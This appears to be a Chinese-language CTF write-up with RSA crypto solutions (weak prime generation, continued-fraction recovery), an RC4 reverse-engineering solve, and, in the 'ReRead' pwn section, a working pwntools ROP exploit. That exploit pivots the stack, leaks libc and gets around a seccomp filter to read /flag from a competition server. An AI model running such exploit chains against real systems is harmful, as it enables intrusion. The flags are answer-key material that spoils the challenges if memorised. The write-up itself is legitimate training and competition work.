Crypto
欧拉欧拉
这题给了很诡异的素数生成方式。p和q异或后基本是一串1,这个差是-3
flag = b'flag{*********}'
m = bytes_to_long(flag)
def get_prime(bits):
while True:
p = getPrime(bits)
x = (1 << bits) - 1 ^ p
for i in range(-10, 11):
if isPrime(x + i):
return p, x + i, i
p, q, i = get_prime(512)
n = p * q
e = 65537
c = pow(m, e, n)
print("c =", c)
print("n =", n)
print("i =", i)
'''
c = 14859652090105683079145454585893160422247900801288656111826569181159038438427898859238993694117308678150258749913747829849091269373672489350727536945889312021893859587868138786640133976196803958879602927438349289325983895357127086714561807181967380062187404628829595784290171905916316214021661729616120643997
n = 18104347461003907895610914021247683508445228187648940019610703551961828343286923443588324205257353157349226965840638901792059481287140055747874675375786201782262247550663098932351593199099796736521757473187142907551498526346132033381442243277945568526912391580431142769526917165011590824127172120180838162091
i = -3
'''所以p+q = (1<<512)-4
#(q+3)^p = (1<<512)-1
from Crypto.Util.number import *
p_q = (1<<512)-4
phi = n-p_q+1
long_to_bytes(int(pow(c,inverse_mod(65537,phi),n)))
#flag{y0u_really_kn0w_the_phi}圣石匕首
给了一个很复杂的程序,没看懂,不过运行一下就出结果。
俱以我之名
这里边给了一个All_in_my_name这个模,y是x对它的逆。
所以这里给了y和模。
from Crypto.Util.number import *
from gmpy2 import *
import random
def pad(msg, nbits):
pad_length = nbits - len(msg) * 8 - 8
assert pad_length >= 0
pad = random.getrandbits(pad_length).to_bytes((pad_length + 7) // 8, "big")
padded_msg = pad[:len(pad)//2] + b"\x00" + msg + pad[len(pad)//2:]
return padded_msg
def All_in_my_name(p, q):
#开启三技能<俱以我之名>后,维娜立即在周围八格可部署地面召唤“黄金盟誓(Golden_Oath)”;对RSA造成真实伤害。
Golden_Oath = (p-114)*(p-514)*(p+114)*(p+514)*(q-1919)*(q-810)*(q+1919)*(q+810)
x = bytes_to_long(pad(gift, random.randint(bytes_to_long(gift).bit_length(), 512)))
y = inverse(x, Golden_Oath)
return y
flag = b'flag{?????}'
gift = b'?????'
assert gift[:3] == b'end'
p = getPrime(512)
q = getPrime(512)
n = p*q
e = 65537
c = pow(bytes_to_long(flag), e,n)
print(f'n = {n}')
print(f'c = {c}')
print(f'All_in_my_name = {All_in_my_name(p, q)}')
'''
n = 141425071303405369267688583480971314815032581405819618511016190023245950842423565456025578726768996255928405749476366742320062773129810617755239412667111588691998380868379955660483185372558973059599254495581547016729479937763213364591413126146102483671385285672028642742654014426993054793378204517214486744679
c = 104575090683421063990494118954150936075812576661759942057772865980855195301985579098801745928083817885393369435101522784385677092942324668770336932487623099755265641877712097977929937088259347596039326198580193524065645826424819334664869152049049342316256537440449958526473368110002271943046726966122355888321
All_in_my_name = 217574365691698773158073738993996550494156171844278669077189161825491226238745356969468902038533922854535578070710976002278064001201980326028443347187697136216041235312192490502479015081704814370278142850634739391445817028960623318683701439854891399013393469200033510113406165952272497324443526299141544564964545937461632903355647411273477731555390580525472533399606416576667193890128726061970653201509841276177937053500663438053151477018183074107182442711656306515049473061426018576304621373895497210927151796054531814746265988174146635716820986208719319296233956243559891444122410388128465897348458862921336261068868678669349968117097659195490792407141240846445006330031546721426459458395606505793093432806236790060342049066284307119546018491926250151057087562126580602631912562103705681810139118673506298916800665912859765635644796622382867334481599049728329203920912683317422430015635091565073203588723830512169316991557606976424732212785533550238950903858852917097354055547392337744369560947616517041907362337902584102983344969307971888314998036201926257375424706901999793914432814775462333942995267009264203787170147555384279151485485660683109778282239772043598128219664150933315760352868905799949049880756509591090387073778041
'''可以得到一个式子:x*y = k* Golden_Oath ≈ k*N^4 ,所以可以用连分式法y/N^4 来求k和x,求出k以后就能求出Golden_Oath
y = All_in_my_name
#xy = k*G ≈ k*N^4 通过连分式求解
f = continued_fraction(Integer(n^4) / Integer(y))
for i in range(1,300):
x = f.numerator(i)
k = f.denominator(i)
v = long_to_bytes(int(x))
if b'\0end' in v:
print(v,k,x)
break
#b'5`\xf4\xf6t\xa3\x00end1n9_A_G2@nd_Ov3RTu2e\x1c\x13"H\x0f\xc9' 56398712132783063027132828918468670442692437484816382768162819797891220782528221182512 103697213497220650500739251621743955651854455782387759691953279488676501281257640431561
G = (x*y-1)//k
然后得到两个式子,一个是G这个,另一个是p*q==n,通过消元求出p,q的大概值,再cooper求p
#通过有理数域水消元后求出大概值,
PR.<p,q> = PolynomialRing(QQ)
f1 = (p-114)*(p-514)*(p+114)*(p+514)*(q-1919)*(q-810)*(q+1919)*(q+810) -G
f2 = p*q - n
h = f1.sylvester_matrix(f2, q).det()
res = h.change_ring(RealField(1024)).univariate_polynomial().monic().roots()
for i in res:
p = abs(int(i[0]))
if n%p == 0:
print(p)
break
long_to_bytes(int(pow(c,inverse_mod(65537,p-1),p)))
#b'flag{rE@L_d@m@9e_15_7h3_mo5t_au7hEn7ic_dam49E}'PWN
ReRead
这里有个明显的溢出,不过限制了只能用open,write并且read只能是0。
先作个移栈,然后用把0 close再打开文件就使用0,然后write
from pwn import *
context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')
elf = ELF('./pwn')
pop_rdi = 0x00000000004013e3 # pop rdi ; ret
base = 0x404800
#p = process('./pwn')
#gdb.attach(p, "b*0x4013cf\nc")
p = remote('8.147.132.32', 16814)
pop_rbp = 0x000000000040117d # pop rbp ; ret
pop_rdi = 0x0000000000401473 # pop rdi ; ret
pop_rsi = 0x0000000000401471 # pop rsi ; pop r15 ; ret
leave_ret = 0x4013cf
base = 0x404800
p.sendafter(b'\x9f\x98\x8b\n', b'A'*0x40 + flat(base, 0x4013ac))
p.sendafter(b'done!\n',flat(pop_rdi, elf.got['puts'], elf.plt['puts'], pop_rbp,base+0x100,0x4013ac,0,0, base-0x40-8, leave_ret))
libc.address = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\0')) - libc.sym['puts']
print(f"{libc.address = :x}")
pop_rax = libc.address + 0x0000000000036174 # pop rax ; ret
pop_rsi = libc.address + 0x000000000002601f # pop rsi ; ret
pop_rdx = libc.address + 0x0000000000119431 # pop rdx ; pop r12 ; ret
syscall = libc.sym['getpid'] + 9
p.send(flat(pop_rdi, 0, pop_rsi, base+0x100 ,pop_rdx, 0x400,b'/flag\0\0\0',libc.sym['read'], base+0x100-0x40-8, leave_ret))
p.send(flat([
pop_rdi, 0, pop_rax,3, syscall, #close(0)
pop_rdi, base+0x100-0x10, pop_rsi,0,pop_rax, 2, syscall, #open
pop_rdi, 0, pop_rsi, base-0x100, pop_rdx, 0x50,0, pop_rax, 0, syscall, #read
pop_rdi, 1, pop_rax, 1, syscall
]))
p.interactive()
#open,read(0,),write
'''
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x06 0x00 0x40000000 if (A >= 0x40000000) goto 0010
0004: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0008
0005: 0x15 0x05 0x00 0x00000001 if (A == write) goto 0011
0006: 0x15 0x04 0x00 0x00000002 if (A == open) goto 0011
0007: 0x15 0x03 0x00 0x00000021 if (A == dup2) goto 0011
0008: 0x20 0x00 0x00 0x00000010 A = args[0]
0009: 0x15 0x01 0x00 0x00000000 if (A == 0x0) goto 0011
0010: 0x06 0x00 0x00 0x00000000 return KILL
0011: 0x06 0x00 0x00 0x7fff0000 return ALLOW
'''
Maze_Rust
作完几天了,忘了,略
Sign in
MakeHero
REV
easygui
enc = [-33,-57,77,20,-63,-20,8,-28,95,63,3,-76,-112,74,-71,-113,-113,-6,113,67,-57,-15,-99,-35,79,-64,18,68,92,-99,-120,54,45,22,29,-19,-68,-17,-69,91,-97,119,-21,88]
enc = [i&0xff for i in enc]
dic = [0x31, 0x74, 0x54, 0x20, 0x03, 0x53, 0x78, 0x70, 0x3A, 0x35, 0x65, 0x42, 0x04, 0x6B, 0x1F, 0x43] + [0x06, 0x37, 0x00, 0x76, 0x21, 0x08, 0x0B, 0x13, 0x52, 0x4B, 0x2F, 0x1A, 0x59, 0x2C, 0x56, 0x51]+ [0x7F, 0x3B, 0x0E, 0x05, 0x26, 0x15, 0x25, 0x63, 0x64, 0x7A, 0x3C, 0x29, 0x41, 0x2A, 0x12, 0x17]+[0x2E, 0x39, 0x57, 0x3D, 0x66, 0x33, 0x44, 0x6C, 0x6F, 0x47, 0x16, 0x71, 0x5F, 0x1C, 0x14, 0x5A]+[0x0C, 0x4F, 0x01, 0x30, 0x1B, 0x68, 0x0F, 0x62, 0x3F, 0x18, 0x69, 0x6D, 0x7E, 0x5D, 0x6A, 0x28]+[0x22, 0x5B, 0x55, 0x72, 0x09, 0x5E, 0x02, 0x3E, 0x50, 0x7B, 0x46, 0x45, 0x38, 0x10, 0x48, 0x79]+[0x60, 0x36, 0x61, 0x6E, 0x2D, 0x49, 0x7C, 0x2B, 0x34, 0x27, 0x11, 0x7D, 0x0D, 0x0A, 0x77, 0x73]+[0x58, 0x5C, 0x4C, 0x32, 0x4D, 0x1E, 0x24, 0x40, 0x67, 0x4A, 0x4E, 0x1D, 0x07, 0x75, 0x19, 0x23]
hexenc = ''.join([hex(i)[2:].zfill(2) for i in enc])
#'dfc74d14c1ec08e45f3f03b4904ab98f8ffa7143c7f19ddd4fc012445c9d88362d161dedbcefbb5b9f77eb58'
#1,查表
#3,RC4
v31 = (b"easy_GUI"*33)[:256]
v29 = list(range(256))
j = 0
for i in range(256):
j = (v29[i]+v31[i]+j)%256
v29[i],v29[j] = v29[j],v29[i]
j = 0
k = 0
stream = []
for i in range(44):
j = (j+1)%256
k = (k+v29[j])%256
v29[j],v29[k] = v29[k],v29[j]
stream.append(v29[(v29[k]+v29[j])%256])
dec = [enc[i]^stream[i] for i in range(44)]
#2,循环右移3位->左
s = ''.join([bin(i)[2:].zfill(8) for i in dec])
b = []
for i in range(0, len(s), 32):
v = s[i:i+32]
v = v[3:]+v[:3]
b += [int(v[j:j+8],2) for j in range(0,32,8)]
#查表
m = [dic.index(i) for i in b]
print(bytes(m))
#flag{GU!_r3v3R5e_3nG1n3er1ng_i5_v3ry_s1mpl3}PlzDebugMe
ezrust
MazE
洞OVO
感觉这周还可以,没大意思,好些找不着当时怎么作的了。中间有事不在,作了一晚上作完后再回来好像啥都没有了。先记这么多。